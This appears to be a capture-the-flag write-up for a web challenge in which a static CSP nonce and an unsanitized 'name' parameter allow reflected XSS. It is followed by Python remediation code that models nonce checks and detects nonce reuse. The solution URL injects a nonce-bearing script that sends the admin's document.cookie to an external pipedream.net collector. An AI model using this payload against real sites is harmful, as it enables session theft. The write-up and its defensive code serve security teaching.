Difficulty:

Notes:

  • The CSP nonce is static per deployment
  • The `name` query parameter is not sanitized before

Rabbit Holes:

Solution:

A simple reflected XSS payload that exfiltrates the admin's cookie. Because the nonce is static, it can be hardcoded into the injected script tag and the CSP accepts it.

https://babier-csp.dicec.tf/?name=lemon <script nonce=LRGWAXOY98Es0zz0QOVmag==> location.window="http://enk6w2e573qoxoa.m.pipedream.net/%22+document.cookie+%22speckij";

Flag

Remediation:
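The fix is to mint a fresh, unpredictable nonce for every response instead of reusing one per deployment. The following is an added example (not part of the original writeup or the challenge's source) that models the browser's nonce check, shows why the hardcoded value from the note above passes under a static deployment and fails under a rotating one, and includes a small detection routine that flags nonce reuse across captured CSP headers; `make_csp_header`, `fresh_nonce`, `script_allowed` and `reused_nonces` are hypothetical helper names, and the sample headers are constructed inline.

```python
import re
import secrets
from collections import Counter

# Matches each 'nonce-…' source expression in a Content-Security-Policy header.
CSP_NONCE_RE = re.compile(r"'nonce-([A-Za-z0-9+/=_-]+)'")


def make_csp_header(nonce: str) -> str:
    """Build a minimal CSP that only allows scripts carrying the given nonce."""
    return f"default-src 'none'; script-src 'nonce-{nonce}'"


def fresh_nonce() -> str:
    """Per-response nonce: 128 bits from the OS CSPRNG, base64url-encoded (22 chars)."""
    return secrets.token_urlsafe(16)


def extract_nonces(csp_header: str) -> list[str]:
    """Return every nonce value declared in a CSP header."""
    return CSP_NONCE_RE.findall(csp_header)


def script_allowed(csp_header: str, script_nonce: str) -> bool:
    """Model the browser's check: an inline/injected script runs only if its
    nonce attribute exactly matches a nonce declared in the response's CSP."""
    return script_nonce in extract_nonces(csp_header)


def reused_nonces(csp_headers: list[str]) -> dict[str, int]:
    """Detection helper: count how many responses declared each nonce and
    return the ones seen more than once. Any hit means the nonce is not
    per-response and CSP gives no protection against injected scripts."""
    counts: Counter = Counter()
    for header in csp_headers:
        for nonce in set(extract_nonces(header)):
            counts[nonce] += 1
    return {nonce: n for nonce, n in counts.items() if n > 1}


# Constructed sample: the static nonce quoted in the writeup, reused on three responses.
STATIC_NONCE = "LRGWAXOY98Es0zz0QOVmag=="
static_responses = [make_csp_header(STATIC_NONCE) for _ in range(3)]

# Constructed sample: the remediated behaviour, a new nonce on every response.
rotating_responses = [make_csp_header(fresh_nonce()) for _ in range(3)]


if __name__ == "__main__":
    print("static deployment, hardcoded nonce accepted:",
          script_allowed(static_responses[0], STATIC_NONCE))      # True
    print("rotating deployment, hardcoded nonce accepted:",
          script_allowed(rotating_responses[0], STATIC_NONCE))    # False
    print("reused nonces in static capture:", reused_nonces(static_responses))
    print("reused nonces in rotating capture:", reused_nonces(rotating_responses))
```

Run `reused_nonces` over the `Content-Security-Policy` headers of a few captured responses from the same endpoint: a non-empty result is the fingerprint of this class of misconfiguration. In a real server the nonce must be generated inside the request handler and passed into the template for every `<script>` tag, never read from a config file or module-level constant.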